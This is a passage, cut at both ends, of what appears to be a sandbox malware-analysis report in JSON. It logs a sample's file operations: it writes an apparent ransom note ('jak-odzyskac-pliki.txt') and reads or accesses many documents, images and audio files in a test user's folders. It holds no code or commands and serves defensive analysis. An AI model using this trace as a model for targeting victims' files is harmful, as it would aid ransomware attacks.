"c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\nVO-4P-KzZ-c6DO0e\\1BUS.odt", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\nvo-4p-kzz-c6do0e\\1bus.odt", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\nVO-4P-KzZ-c6DO0e\\b-s_mvDIaHRjA WonYD7.csv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\nvo-4p-kzz-c6do0e\\b-s_mvdiahrja wonyd7.csv", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\3fRpiUpvJo9PXh.doc", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\3frpiupvjo9pxh.doc", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\7wlDZE9WQQHKod.odp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\7wldze9wqqhkod.odp", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\hvCemxS1iSlcK.doc", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\hvcemxs1islck.doc", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\pA730znoL5.rtf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\pa730znol5.rtf", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\HKRkjnzp\\_X864G9NgHeHTp16YW.ods", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\_x864g9nghehtp16yw.ods", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\0qp cbTp2kDuTxPhn8y.csv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\0qp cbtp2kdutxphn8y.csv", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\F6P3h-e5k60SlJ.pdf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\f6p3h-e5k60slj.pdf", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\iUfdaFezBB3P- l4I3e.rtf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\iufdafezbb3p- l4i3e.rtf", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\pWQHqSJInPvfKbJkRZb.rtf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\pwqhqsjinpvfkbjkrzb.rtf", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\P9grc6N9ugQ9v\\t8rijBa3r5rIl.pptx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\t8rijba3r5ril.pptx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\0_b3IJRL61ikm2.xls", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\0_b3ijrl61ikm2.xls", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\568WxqKDq_FIMwoN.pdf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\568wxqkdq_fimwon.pdf", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\8m1FCp.ots", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\8m1fcp.ots", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\p2QHvHrC07x 6M.odt", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p2qhvhrc07x 6m.odt", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\URm66b8mfK_B.docx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\urm66b8mfk_b.docx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\vfwuhDCvzF0GRto.pptx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\vfwuhdcvzf0grto.pptx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\OXq6TNDno0\\wVF JPe1b.xls", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\wvf jpe1b.xls", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\n1mKD81VKeIa7S2.rtf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\n1mkd81vkeia7s2.rtf", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\ORRmspMNhOgtvaB.doc", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\orrmspmnhogtvab.doc", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\PP5 bxjS.pptx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\pp5 bxjs.pptx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\qa6QFkq\\xlyLS6yx0MIco1.pps", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\xlyls6yx0mico1.pps", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\-GJqEDw.odt", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\-gjqedw.odt", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\8pUhJoF5OUB0zF3kJ4pk.ods", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\8puhjof5oub0zf3kj4pk.ods", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\eQOV.odp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\eqov.odp", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\SzJbmK.odt", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\szjbmk.odt", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\TWIwOWOOuJkW1 zw.xlsx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\twiwowooujkw1 zw.xlsx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\x4gPVtjMaNPIjOUfG-lC.doc", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\x4gpvtjmanpijoufg-lc.doc", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\0kc5Nr5.rtf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\0kc5nr5.rtf", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\9oIEfcy.csv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\9oiefcy.csv", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\A2yHS.rtf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\a2yhs.rtf", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\JjJMV9taw3HHVo.ods", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\jjjmv9taw3hhvo.ods", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\Okb6cH9a4iQrI_jw.csv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\okb6ch9a4iqri_jw.csv", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\PNXTgcQo4yh5r.odt", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\pnxtgcqo4yh5r.odt", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\31C8Jf9y_xli.docx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\31c8jf9y_xli.docx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\4MQNX-qcbrpg7.docx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\4mqnx-qcbrpg7.docx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\aOniMexN t.xlsx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\aonimexn t.xlsx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\BcAtcIc FCi96Kikr19.pptx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\bcatcic fci96kikr19.pptx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\bdVwr.doc", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\bdvwr.doc", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\D-4thVUMdh.csv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\d-4thvumdh.csv", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\Ev0YlMk5921.pptx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\ev0ylmk5921.pptx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\FbmlDMOUw-TzOy_UnN7.xlsx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\fbmldmouw-tzoy_unn7.xlsx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\gXfWKSuNYtgFj.pptx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\gxfwksunytgfj.pptx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\HHx-9RKiMuPSNON0eJb.pptx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\hhx-9rkimupsnon0ejb.pptx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\lcPTyHQE.xlsx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\lcptyhqe.xlsx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\u5X9.ppt", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\u5x9.ppt", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\WffPHgzW1qt5nuBKPq.docx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\wffphgzw1qt5nubkpq.docx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\Zb6u3g7h.xlsx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\zb6u3g7h.xlsx", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\m-puIO0ZGGG_DdsrzN.docx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\m-puio0zggg_ddsrzn.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\nfjvj4.docx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\nfjvj4.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\q7IKH0zTPGa.pptx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\q7ikh0ztpga.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\Qis2t0idI.docx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\qis2t0idi.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\RLtENk6-mjNOz-raUF3v.xlsx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\rltenk6-mjnoz-rauf3v.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\hGZFj\\-fs-R5u50BfKvf.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj\\-fs-r5u50bfkvf.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\hGZFj\\Z3txdNfa.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj\\z3txdnfa.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\TmdCgSua1hPeIxp_g-_\\3wLGR0fUmkcND1.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\3wlgr0fumkcnd1.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\TmdCgSua1hPeIxp_g-_\\8hsXLmZ5FCCheFKC.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\8hsxlmz5fcchefkc.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\TmdCgSua1hPeIxp_g-_\\pR 2s.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\pr 2s.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\2mLpi.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\2mlpi.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\JP-9xm1BMM.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\jp-9xm1bmm.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\M8qmIADbo6Rfghx.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\m8qmiadbo6rfghx.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\_g8EG0.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\_g8eg0.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\C7FcN8b.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\c7fcn8b.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\dhn.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\dhn.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\HLuFP.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\hlufp.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\hy7xiC9tP5aFULp5TBa.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\hy7xic9tp5afulp5tba.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\ljSzdoYLTSvld u.jpg", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\ljszdoyltsvld u.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\MEtsfgADG8jkpvQ.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\metsfgadg8jkpvq.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\QB7s9AH4L3t.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\qb7s9ah4l3t.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\vuewIfEOk\\btMvVnX CFKn1XV99U44.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\btmvvnx cfkn1xv99u44.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\vuewIfEOk\\c WNWiE5.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\c wnwie5.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\vuewIfEOk\\ZFDojVkI.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\zfdojvki.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\-4w-q4wd1z.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\-4w-q4wd1z.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\FS30OROMoJdbC.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\fs30oromojdbc.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\KFh DlKG2stAGLP.jpg", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\kfh dlkg2staglp.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\kvHYSDZaY9p7NO8Z735z.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\kvhysdzay9p7no8z735z.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\pFfH.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\pffh.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\HJ3HCKNndjhrdYoB.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\hj3hcknndjhrdyob.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\IQ814T.jpg", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\iq814t.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\S-t1dx_AJ3.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\s-t1dx_aj3.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\4Nz6FD 37UMclhfq6.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\4nz6fd 37umclhfq6.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\dXFMoRUEzqjI.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\dxfmoruezqji.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\IjyzG07WaZVWa6FxqH0.gif", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\ijyzg07wazvwa6fxqh0.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\np ZA.bmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\np za.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\OyPzZX.jpg", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\oypzzx.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\CQqMpg-jbIVE.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\cqqmpg-jbive.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\EH1OC XshC.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\eh1oc xshc.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\jmrFGsOlm2gK_qf.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\jmrfgsolm2gk_qf.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\MtD6XQw0JRc8h.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\mtd6xqw0jrc8h.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\D XgP5yxO\\zXoge.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\d xgp5yxo\\zxoge.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt 